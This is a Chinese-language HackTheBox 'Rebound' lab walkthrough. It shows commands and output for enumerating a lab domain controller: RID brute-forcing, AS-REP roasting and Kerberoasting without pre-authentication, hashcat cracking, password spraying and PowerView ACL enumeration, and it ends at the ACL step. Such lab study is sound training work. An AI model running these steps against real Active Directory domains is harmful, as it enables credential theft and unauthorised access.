HacktheBox-Rebound

前言

那天看到有某 up 在讲这个,找个时间学习下。给 AD 域的细节串串。

跟着 wp 照着打一遍,学学。

信息收集

nmap 扫下

1
nmap -p- --min-rate 1000 10.10.11.231
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-03 18:59 CST
Nmap scan report for 10.10.11.231
Host is up (0.41s latency).
Not shown: 65509 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49671/tcp open unknown
49686/tcp open unknown
49687/tcp open unknown
49688/tcp open unknown
49701/tcp open unknown
49716/tcp open unknown
49737/tcp open unknown
49785/tcp open unknown

清洗下探测。

1
53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49686,49687,49688,49701,49716,49737,49785,
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
nmap -sSCV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49686,49687,49688,49701,49716,49737,49785 10.10.11.231
Nmap scan report for 10.10.11.231
Host is up (0.41s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-03 17:51:56Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb, DNS:rebound.htb, DNS:rebound
| Not valid before: 2025-03-06T19:51:11
|_Not valid after: 2122-04-08T14:05:49
|_ssl-date: 2025-04-03T17:53:10+00:00; +6h41m03s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb, DNS:rebound.htb, DNS:rebound
| Not valid before: 2025-03-06T19:51:11
|_Not valid after: 2122-04-08T14:05:49
|_ssl-date: 2025-04-03T17:53:10+00:00; +6h41m04s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb, DNS:rebound.htb, DNS:rebound
| Not valid before: 2025-03-06T19:51:11
|_Not valid after: 2122-04-08T14:05:49
|_ssl-date: 2025-04-03T17:53:10+00:00; +6h41m03s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb, DNS:rebound.htb, DNS:rebound
| Not valid before: 2025-03-06T19:51:11
|_Not valid after: 2122-04-08T14:05:49
|_ssl-date: 2025-04-03T17:53:10+00:00; +6h41m04s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49686/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49687/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
49737/tcp open msrpc Microsoft Windows RPC
49785/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h41m03s, deviation: 0s, median: 6h41m03s
| smb2-time:
| date: 2025-04-03T17:53:03
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.06 seconds

加下 /etc/hosts,然后重启服务systemctl restart networking

1
2
echo "10.10.11.231 dc01.rebound.htb rebound.htb" | tee -a /etc/hosts
systemctl restart networking

SMB

匿名连接:

1
smbclient -L \\\\10.10.11.231\\

我们继续尝试发现可以能匿名链接 Shared 部分,但是它是空的。然后可以用lookupsid.py枚举存在用户的 SID。它通过循环遍历相对标识符(rid)来实现这一点,rid 与域的 SID 连接以形成整个 SID。

对于域帐户,通过将域的 SID 与帐户的相对标识符(RID)连接来创建安全主体的 SID

For domain accounts, the SID of a security principal is created by concatenating

the SID of the domain with a relative identifier (RID) for the account.

这里的 lookupsid 通过已建立的匿名 SMB 连接(如访问 Shared 共享建立的连接)发送特定查询。因为域 SID 格式:S-1-5-21-,最后一部分是相对标识符(RID),常见用户 RID 从 1000 开始。然后爆破出用户。这个 lookupsid 默认设置的是最高 RID 是 4000,所以需要设置下爆破所有。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
lookupsid.py nan@10.10.11.231 10000 -no-pass
Impacket v0.13.0.dev0+20250401.172759.352695f1 - Copyright Fortra, LLC and its affiliated companies

[*] Brute forcing SIDs at 10.10.11.231
[*] StringBinding ncacn_np:10.10.11.231[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: rebound\Administrator (SidTypeUser)
501: rebound\Guest (SidTypeUser)
502: rebound\krbtgt (SidTypeUser)
512: rebound\Domain Admins (SidTypeGroup)
513: rebound\Domain Users (SidTypeGroup)
514: rebound\Domain Guests (SidTypeGroup)
515: rebound\Domain Computers (SidTypeGroup)
516: rebound\Domain Controllers (SidTypeGroup)
517: rebound\Cert Publishers (SidTypeAlias)
518: rebound\Schema Admins (SidTypeGroup)
519: rebound\Enterprise Admins (SidTypeGroup)
520: rebound\Group Policy Creator Owners (SidTypeGroup)
521: rebound\Read-only Domain Controllers (SidTypeGroup)
522: rebound\Cloneable Domain Controllers (SidTypeGroup)
525: rebound\Protected Users (SidTypeGroup)
526: rebound\Key Admins (SidTypeGroup)
527: rebound\Enterprise Key Admins (SidTypeGroup)
553: rebound\RAS and IAS Servers (SidTypeAlias)
571: rebound\Allowed RODC Password Replication Group (SidTypeAlias)
572: rebound\Denied RODC Password Replication Group (SidTypeAlias)
1000: rebound\DC01$ (SidTypeUser)
1101: rebound\DnsAdmins (SidTypeAlias)
1102: rebound\DnsUpdateProxy (SidTypeGroup)
1951: rebound\ppaul (SidTypeUser)
2952: rebound\llune (SidTypeUser)
3382: rebound\fflock (SidTypeUser)
5277: rebound\jjones (SidTypeUser)
5569: rebound\mmalone (SidTypeUser)
5680: rebound\nnoon (SidTypeUser)
7681: rebound\ldap_monitor (SidTypeUser)
7682: rebound\oorend (SidTypeUser)
7683: rebound\ServiceMgmt (SidTypeGroup)
7684: rebound\winrm_svc (SidTypeUser)
7685: rebound\batch_runner (SidTypeUser)
7686: rebound\tbrady (SidTypeUser)
7687: rebound\delegator$ (SidTypeUser)

清洗一下数据,但是他这个是使用命令清洗的,我菜,所以用可视化了。提取的是 SidTypeUser,这个一般代表可利用账户。

1
lookupsid.py nan@10.10.11.231 10000 -no-pass | grep 'SidTypeUser' | sed 's/.*\\\(.*\) (SidTypeUser)/\1/' > usernames.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Administrator
Guest
krbtgt
DC01$
ppaul
llune
fflock
jjones
mmalone
nnoon
ldap_monitor
oorend
winrm_svc
batch_runner
tbrady
delegator$

入口点

搜寻 AS-REP-roasting 攻击的用户,配置的时候不要求 Kerberos 预身份验证。用 GetNPUsers.py 来批量看用户是否存在漏洞(UF_DONT_REQUIRE_PREAUTH)参数。

1
GetNPUsers.py -dc-ip 10.10.11.231 rebound.htb/ -usersfile usernames.txt
1
$krb5asrep$23$jjones@REBOUND.HTB:0bc201fbc7633d7659a692dbdae5417a$2f61224306482f9b27d7ac0e23e076dee4f2908a54024b6c3c76b561cc6f632ca552fa95855600f435435a0b08f6f8232e2c1107098cbce70d82b4b6b30696458877029be8ff9d684718eff61f45472167592ac5d547cce364b2e6df0a9ef7d6692bd530e11604435d07302ec16ad9b2e5ba27ceb6d30010c8427b78b1b9efd8c846bd22b67cec266bc526210b4a798b53dfe152cec531ad95215de982f345212c4eb902195e774599c56295d7f699bd446e70178b3bc087f366ea0f5e3afc709f4d79440d1d5e7bc8ce5a60d42835e566b70ca939bbb1d2e076d52915f9ca184a0811ffb14f11125213

hashcat 爆破 hash

1
hashcat -m 18200 '$krb5asrep$23$jjones@REBOUND.HTB:0bc201fbc7633d7659a692dbdae5417a$2f61224306482f9b27d7ac0e23e076dee4f2908a54024b6c3c76b561cc6f632ca552fa95855600f435435a0b08f6f8232e2c1107098cbce70d82b4b6b30696458877029be8ff9d684718eff61f45472167592ac5d547cce364b2e6df0a9ef7d6692bd530e11604435d07302ec16ad9b2e5ba27ceb6d30010c8427b78b1b9efd8c846bd22b67cec266bc526210b4a798b53dfe152cec531ad95215de982f345212c4eb902195e774599c56295d7f699bd446e70178b3bc087f366ea0f5e3afc709f4d79440d1d5e7bc8ce5a60d42835e566b70ca939bbb1d2e076d52915f9ca184a0811ffb14f11125213' /usr/share/wordlists/rockyou.txt

但是似乎不能爆破出来。

无凭证 Kerberoasting

However, for Kerberoasting, access to the session key is not required. Only the resulting ST—or more accurately, the encrypted part of the ST, which is not secured with the requesting accounts key—is required. Therefore, if any account is configured to not require pre-authentication, it is possible to Kerberoast without any credentials.

但是,对于 Kerberoasting,不需要访问会话密钥。只需要生成的 ST,或者更准确地说,不使用请求帐户密钥保护的 ST 的加密部分。因此,如果将任何帐户配置为不需要预身份验证,则可以在没有任何凭据的情况下进行 Kerberoast。

Support for Kerberoasting without pre-authentication and ST request through AS-REQ by ShutdownRepo · Pull Request #1413 · fortra/impacket

现在的版本的 impacket 支持这个参数 -no-preauth,可以通过这种方式拿到 jjone 的 TGT。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
GetUserSPNs.py -no-preauth jjones -request -usersfile usernames.txt rebound.htb/ -dc-ip 10.10.11.231
Impacket v0.13.0.dev0+20250401.172759.352695f1 - Copyright Fortra, LLC and its affiliated companies

[-] Principal: Administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$krbtgt$REBOUND.HTB$*krbtgt*$eb6327d4e7a899a4c90a7fe9$5ba2eeba25ffb118c6a8ef1351e16adf2a9024690ee10bcc0690c573feb4282076ffe8b6049e3ce8baca1ebd012364e753013674b16186d693d0d888e1ee1d3078b6bf309b08f5ff68c28d7847496876aa0ee847e9c45ab01f8405dd7239ecc36ec5113f7bc22b9f3458ca864310ea787060d5664aa7f228e6c63cbe5059b6030dc942d7ddbd82f460823adb57a5b72e9a4690aebee1ed1821f18f24eb6227e56e11eed6431eed605fa5ed7b8170319f46b40357476456cdd7551245b3bb416af5e9f2ae1a8cd4f14d5a8b3cb4a3769ea897eef0e88b17c0b44d3de16e057a6fcda63aa0a7642578523c448d0d87bcc313d16c71ea8ffd952e6e16ce4c135450c4453b9bf523d1dac0f13a86c452a98a4f145ee6939d9b1da0d11e4eb8116a4403a469a7a8865fd24e03049072a0cb276e591a9c9edbeee818919d56228ef01c4b44b06c8385b56de2ea48d4d8457f9cea5056fe0936e8e354aa7391fbcc45d6dfcc349c354e0a3e6cf8ca79e145066c423d3c4f15fa6981e2edd81ee8ec1eea7bee971f0a607c98f61c6c59df0a3774d2a3502b556008041e6bdae80e6e14f246b1a7b4d10dcf5a8b3c88e77766fc6515afa75bad6b1704f6fdfcddf2f2c6c3c9e430a112347027d0332835c1fb2ee74b64fe8793c71705548a1ec62b4f31b6cc91a1786de64a61416c266e7d520ac04d3bbeb14b14e31f8e584226a1e50a5f5fedc276acde68c6f34c108698c0cd0dd2f93691a4d1d00f1274be471728f9b731acafbb9e583915dbca59fbc33749e3dcbc6c32dcdd058fb72031480f92f0f5fe29f34860a076c0c3f1a76bf8963287bac02e6c79bbf9ae095d621432596784ddd24671c951b7df843d9a453181b2368fe48e93f04bfe88da4ba5b31b5a910a6869891c835df4cd33cc19b87d59d385bfd9feb9a63658eb7e1631448a7c96e5116ad202507198f821409983b15598a6f41b95d86208c72ff9476954140756b8efb8a0558bb6f10069180698005df87b53cec06f77f03e863fb57f7fc978c93838129ba48a9657a5a125287ce3e648e440b7ca9dd3904952ec17d494d1bdf303b99da31e8a2fb28535d9e8320cecf51eaeabe4694e5afdb86868a7d7db6cf091cb27b1fe88527a2788a3cc4e35890808640e0344859e2053f0b2214f600616edfe4028e9681084f639bf9b2e72c5f42143fb4e408f8fbf7f006c43b1da4a89a567cf77e7315803ee456c308b5ecc443956deae5da50896445e6d481ee1f03767b85938c9ab5b65070e6e1507cce38f47d15ab68b2f9883f12d1a50382af5d9cc68297a0f7712549e00a2efd8be91aa3cb422105d829f3b067e1e01cb702d192f548d5409f2be163220e584bb2ec4fefe233984286082cd18582141ed02533a981d133f4569106cd15d46b94cfbee0d897e5b2699117e897080db77e125f4d2375402db4be637e8532ec0b196a820c3819212
$krb5tgs$18$DC01$$REBOUND.HTB$*DC01$*$7cbd9dd749a5126aee376eb6$0a66b2e0fd2c18b86e4d552478a1edbef924443479771865195925f9d0b1dd89ff567b15da0972f240d25c39822083bd7270a49379271b098ae24b34587507b9559d05a896aee52e207bc734606eb29ee1f7a050e43cb1cc2226d6dc550ac654bdb2b6f98d694ac38dbc5c2e3692e7f0e9ee69a06002d54973ca64e17f338827873dcd1bfe8a7adfa31a7352951d912491e88ac80bf789b990e03c26e08b934986218cfa103d440ce2fe808a81801a44636e522d222c607959a8c4d64995b08806cc0cfd390e802328150d409776fe8ab8cb5072d1226f680253b62dbd18b53a13b434e425286ba8e980c896edc7f3c51ac82b3f817ec8d66807e58d01e60fda0abfa196de7968bce30dcf011c0866b30c9940b7dc0bbda6cfd2327bfd7e42d1f5c6cc575ed864ede4b9a2c5033417af007c7530fec84b4fc1bd1c1c857a896b82a5c25588b9f99eba3e1365054220e35f23ddfc527b703569a7a4cba34c4a244800ac51945601747d2c022e0e5108ea63aa1bb047944bbd859eaacbf858928fdbb7bb8fe259cee72aa8fe4e991d3a7791c0a35b2e57c90e4824180bc6571c89e688be228c231a16b0f57ef4e7ca7d0f6149440ae4b2d84ea2a7328759dd86d69608e17d7158fd6ea0cce3777c0c73c093ba806bd24aef888688c49c3cbd3165a9af111bdcef55f3a70beff9a500fcb45b49119646f58de7c8dad3f744d7db7bbc704e4812b53893d71009903b43f60cfc953fc3a63acd41fdffe91835ff98941c0923f10bb138eb305b3eff348cf9ba1cba1a2b21e1c09f920d936870a793097a3a0909dd0bcdf8e0e6a1fae45651e9daa8da76af4815dc329ee04c89fa6f36c84c8e3dbfcebee5559012c198938fe0eb4d274b8e8be1022aeaaea78d81b9bfa62c0bd05aeae5eb59ad21e957b50206d94457c046429c6b72530b5159c1444a1baf1e7ee06a4d5fd3eed6502ac7004afe46fb3aa22c931aaeeecbfaefa5bd96a32697c6d22d44869b05d93c8fa9bab9c0484d2cbff028dc447acd825d16797df653f1b755cb490cf91591d77a94bbc59799f46411590bf9a7e5a09eaa166a3248ededdc1fe77548d70af20e2d50a89ff6a1265e0decc80336aebaeefafcd3c01579a84f56a9dc654389faeebbbb7cb931d48bfa16c4563105f37ba1c2bb8d37213d19e68b4436b28298d53d2962cc1d877e710a87d65395719efa198a679f03f7faa2ed232e66501bd6a6056aa2509283653b2a3825b1234bec71aef76c27a0865e4651b962c0b834ea628b5d87f65c5b2832cfa6d7aa9b80469331f4688d038afd5760bbc9814e5ae9322e5f626d784c6b956c2e54faa24ad3fde68ef80c6ce0e0ffd16d0de436e096
[-] Principal: ppaul - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: llune - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: fflock - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: jjones - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: mmalone - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: nnoon - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$218629c8ade25b5e45b47d69218b6c7b$6dfdb27d7c619095e8a2c948625fde3c3d80b9768ca21d807b3d5375a083e4f6c24330ab74a9044a101133525483ef5cb10fc4f56d245ad52202d16810e842a1be30597a5cd75c28f62199d7af91803520c21b6c95f56deb494ee49bcc14b0ca1dac726d3cddf4c2935fd2384c68871600d76630de96a7469e23e7d01922277b93d1151831f603c735411ea2e5b4f6ff8bf3e151d702249dc127a8d468df858efe85858eb17f9e6b282bdd996b8303781de31186d02a60bee226964145f40c380dabb8fb5fb8098b77cc329c0cb874fcbbd00496e4738cba33a246e88c4c54991994eb98f3164f7520729b7863c88a6693f7dce112d4952cf30c2c24c2e7bc1ad309778da359b6e2d69580f85eb5b4648397945943d430c73a34aa16b407aec2d8a4ab5c708c2b9cab6e2ff2d72659965da35990f7e0390c6de9114c5952ff101820e7abdc4b708cbc2c795b1776ccd4757285e81fdc2f1c365037f9de13171b0596ed379de49c667a1add1946fe9110773fb88cb6fd020ea3a7d70c9c99f1bd54e4e66e6253ef9c62ce7352ca8ec3b23500ea70f90a53eebe768592a06f7845b1372f68d405de962f47b579a556c84a46b003f4451d064579b5e27be52db822dc2381a544129585a94c1f521fd909da98160739f37f2aa3aa7a3ea878e5d1b21b82813a92e50f064c7c24b79f275e536a5ee83369e6125fc66dd6fd32c386eb5796e684eda003da9e95d152ba23529360416af18df6226c8de986b8fe44e23b0d5c096fb16707d45091fde21bbd582aa8eb92e4057d5f69d19e884a62b0221a1b2aca8515a1166859067ffd3fb4830fadc10050aca85598d94a7aebd7d8dd7ca9b9585f213913113ece75c9018cff109addd63eb85d05f040737169413c1baec73d01b1279d7ab687cf1c441a7187e3a8f39ab44ef05d57dda249acfe962158dcf2ec229ab2df0673de849114a4db0e82221944de1ca4404a596f45175e39776160a587079026ae0fe97a16bac2704da10184fe864e2235d0b8bd4fa17a9dfe6dd083a2e074210e432a852c6d3354becab048880f62f72daa9c111ddef01567189346ea34b564f5564ddb405bc2d46293b5a47f0ffcf7efc6ee33a65bcf77dcf54007f8b7fe05c3a675c0063211c326185f8e07f8a78bb9f6678d4a0c118ca5ef87d36a8efeea06adc75ca89ede3cd169e0f00d4e0628d6f9f86f300a14579e33a4d42c15e6af2a9553372ac4888902a6aa7be1bf95d45f6d61dade0a26cc2b56084367fff4c2e4a2c1985044f8ff685509064c2c1ee5af2887866bcda404ff70f8aadb15ee73b36e9887989afeeb92ab50c54df56784768aed3dfb9e4cab1bf5c5
[-] Principal: oorend - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: winrm_svc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: batch_runner - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: tbrady - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$delegator$$REBOUND.HTB$*delegator$*$2322878b42915089e6dd828c$22b3a2c65a9b2ca43bbaab2847a752a50bfb29e172ca7e3cb7b0b6d407e91be63f5bbfed1f96b2b1f0992c09abc57dc43d8086394f628634df5a5a37652c3619b4168605d5b27d19e0f03f0769dcc9240cd2e541f3b9fbcc62fd26a3f5bb001c7c62ad4f7bb85fc9fbcd65c1edf28891fb3a8e5718248cd471498bc2a4fb15d58bee550484afc8a10da6df5a1ae627996442af00ea1d22bed1d83266f224df4e799eadbdca4ba3ac39cfe595de1ab36fd9c24c64624608900a48bf3a0ce4d5ee126ccf628ceba25e8fc46560dc801e3045baf92fdfa2b36f4011293f6e696f43dc53f9111e39b474ec8c7e3dbb0afc712898f8b5746d2cdc3b4724c3c3b0c199e60fad1b2a374036f2b78c97fdfd0dc14b9819667f4fab23c665b609a35340b121067c6059887639ca2bc641ffe845ca2d8804509018a04973c056c67ee70bf9ae5ec4419057f6aec667381206a5a33dc88c9b11eaba181c139190089a8fb00cdaa16b8a2390671f7b9d44b6ce0f79525ec0e852cd7a966e8818b1fb9ab38c005d6aecc81e14be4c66c0a3a93c167a2ad197e02f250d0d515473c85326753fdc3862c80cc9cbf054060ee19f2383fec08d4d0fce914b986962f343f336e390567aadb18077873365053d977eefdcc97ed15bc29ef6ce106bf22687eee2f2d787c72e24a9f7e44b062a4eae3703b696fbc356d56a377f1a674d6e3e482c66dfb61dcf2753267c39d014d6c00205806cfe7292351c7e03248286bfe761bc92806435e79944a6c54cff940232e97dd97ccde89fda516edfcddd47e468b2cad62558901555ea1c25b97a6b7595ed9448747338448626964e9a1e3b1d45536cbe74a22ceb6571a5d5c7f5f935d141d54a2501837d42d370d18396348f444a036077d381a485a63c9ae904aff734dabe19ee763d8f33e2b3bfd39fc4c585315d6857c93a6772566571fde3e9c2e3740c928f831cba0bdc50f9f2ee2025667fb6f0a622556e696167cfe9de69e8873014808d1c4c71fa2576b0ad05dfdce04156a1dbc692e7eec464589a414eeb978a75ff9f5b3e4d0e7878e331e741c8f2130d5adbf20af4e4dc76d6b2960f89c78345f4560a3fb22fc8ad6667848e7531d72a58ad39935bf8730df771c08620d9a1956d933c1e1f662c5f5e050d33809e45c18a42e5dca20b8d4b5bb7154a6eeee53ce03c5b72dfeb98d518dc360c91643abd4b06f439d245cade99f6928733f232b8f32bf5bb3cd1af16577afe4e00dfd3f90da0004cc04b3b707aa6b3e175a8dd7352ed4ac4f86eca17b5cca3efa687181492410b60558cd5117ea42132796a1c769e1c9fb71fdebce6009cd6626c7330738cfd9e03b0f48d4a75c4bfbc3a

一共申请到了了四份 TGT。三个是 18 一个是 23, 全都加入 txt 爆破一下。

1
2
hashcat -m 19700 hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m 13100 '$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$218629c8ade25b5e45b47d69218b6c7b$6dfdb27d7c619095e8a2c948625fde3c3d80b9768ca21d807b3d5375a083e4f6c24330ab74a9044a101133525483ef5cb10fc4f56d245ad52202d16810e842a1be30597a5cd75c28f62199d7af91803520c21b6c95f56deb494ee49bcc14b0ca1dac726d3cddf4c2935fd2384c68871600d76630de96a7469e23e7d01922277b93d1151831f603c735411ea2e5b4f6ff8bf3e151d702249dc127a8d468df858efe85858eb17f9e6b282bdd996b8303781de31186d02a60bee226964145f40c380dabb8fb5fb8098b77cc329c0cb874fcbbd00496e4738cba33a246e88c4c54991994eb98f3164f7520729b7863c88a6693f7dce112d4952cf30c2c24c2e7bc1ad309778da359b6e2d69580f85eb5b4648397945943d430c73a34aa16b407aec2d8a4ab5c708c2b9cab6e2ff2d72659965da35990f7e0390c6de9114c5952ff101820e7abdc4b708cbc2c795b1776ccd4757285e81fdc2f1c365037f9de13171b0596ed379de49c667a1add1946fe9110773fb88cb6fd020ea3a7d70c9c99f1bd54e4e66e6253ef9c62ce7352ca8ec3b23500ea70f90a53eebe768592a06f7845b1372f68d405de962f47b579a556c84a46b003f4451d064579b5e27be52db822dc2381a544129585a94c1f521fd909da98160739f37f2aa3aa7a3ea878e5d1b21b82813a92e50f064c7c24b79f275e536a5ee83369e6125fc66dd6fd32c386eb5796e684eda003da9e95d152ba23529360416af18df6226c8de986b8fe44e23b0d5c096fb16707d45091fde21bbd582aa8eb92e4057d5f69d19e884a62b0221a1b2aca8515a1166859067ffd3fb4830fadc10050aca85598d94a7aebd7d8dd7ca9b9585f213913113ece75c9018cff109addd63eb85d05f040737169413c1baec73d01b1279d7ab687cf1c441a7187e3a8f39ab44ef05d57dda249acfe962158dcf2ec229ab2df0673de849114a4db0e82221944de1ca4404a596f45175e39776160a587079026ae0fe97a16bac2704da10184fe864e2235d0b8bd4fa17a9dfe6dd083a2e074210e432a852c6d3354becab048880f62f72daa9c111ddef01567189346ea34b564f5564ddb405bc2d46293b5a47f0ffcf7efc6ee33a65bcf77dcf54007f8b7fe05c3a675c0063211c326185f8e07f8a78bb9f6678d4a0c118ca5ef87d36a8efeea06adc75ca89ede3cd169e0f00d4e0628d6f9f86f300a14579e33a4d42c15e6af2a9553372ac4888902a6aa7be1bf95d45f6d61dade0a26cc2b56084367fff4c2e4a2c1985044f8ff685509064c2c1ee5af2887866bcda404ff70f8aadb15ee73b36e9887989afeeb92ab50c54df56784768aed3dfb9e4cab1bf5c5' /usr/share/wordlists/rockyou.txt

23 那个能爆破出来:1GR8t@$$4u,但后面一想,肯定要用 ldap 来收集信息,那就得优先这个了。

我们能注意到这个 ldap_monitor 的名字,能猜测到很有可能是一个服务账号。由其他用户创建时很有可能出现了密码复用,需要做一下 smb 密码喷洒:(需要添加--continue-on-success来获取所有。)

1
nxc smb rebound.htb -u usernames.txt -p '1GR8t@$$4u' -d rebound.htb --continue-on-success

果然有个账号可以用来继续 oorend:1GR8t@$$4u

Powerview 枚举

这里需要安装 PowerView.py

GitHub - aniqfakhrul/powerview.py: Just another Powerview alternative

防止出现问题先 ntpdate 时间同步,再连接。

1
powerview rebound.htb/oorend:'1GR8t@$$4u'@10.10.11.231

注意 如果无法连接,需要进行时间同步,下面的 bloodhound 这里有详细写,你可以看下。(而且在做任何 Kerberos 同步的时候一定要先做时间同步,否则会有告警。)

获取 ldap_monitor 的信息。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
Get-DomainUser -identity ldap_monitor
cn : ldap_monitor
distinguishedName : CN=ldap_monitor,CN=Users,DC=rebound,DC=htb
name : ldap_monitor
objectGUID : {cf7691bd-5b32-407d-9d42-262013f10288}
userAccountControl : NORMAL_ACCOUNT [66048]
DONT_EXPIRE_PASSWORD
badPwdCount : 0
badPasswordTime : 08/04/2023 15:46:25 (1 year, 11 months ago)
lastLogoff : 1601-01-01 00:00:00+00:00
lastLogon : 08/04/2023 16:23:35 (1 year, 11 months ago)
pwdLastSet : 08/04/2023 09:07:56 (1 year, 11 months ago)
primaryGroupID : 513
objectSid : S-1-5-21-4078382237-1492182817-2568127209-7681
sAMAccountName : ldap_monitor
sAMAccountType : SAM_USER_OBJECT
servicePrincipalName : ldapmonitor/dc01.rebound.htb
objectCategory : CN=Person,CN=Schema,CN=Configuration,DC=rebound,DC=htb


Get-DomainUser -identity oorend
cn : oorend
distinguishedName : CN=oorend,CN=Users,DC=rebound,DC=htb
name : oorend
objectGUID : {edb118e8-3995-45d9-89f1-bf978e4e7fa4}
userAccountControl : NORMAL_ACCOUNT [66048]
DONT_EXPIRE_PASSWORD
badPwdCount : 0
badPasswordTime : 09/04/2023 09:54:33 (1 year, 11 months ago)
lastLogoff : 1601-01-01 00:00:00+00:00
lastLogon : 04/04/2025 10:53:25 (today)
pwdLastSet : 08/04/2023 09:07:56 (1 year, 11 months ago)
primaryGroupID : 513
objectSid : S-1-5-21-4078382237-1492182817-2568127209-7682
sAMAccountName : oorend
sAMAccountType : SAM_USER_OBJECT
objectCategory : CN=Person,CN=Schema,CN=Configuration,DC=rebound,DC=htb

然后使用 sid 获取查看 ACL 权限。(注意 PowerView 脚本对于大小写敏感,如果大小写错误很可能出现错误结果。)

1
2
3
4
5
6
7
8
9
10
11
12
PV > Get-DomainObjectAcl -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209-7681
[2025-04-04 14:10:03] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
PV > Get-DomainObjectAcl -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209-7682
[2025-04-04 14:09:41] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
ObjectDN : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7683
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : Self
AccessMask : Self
InheritanceType : None
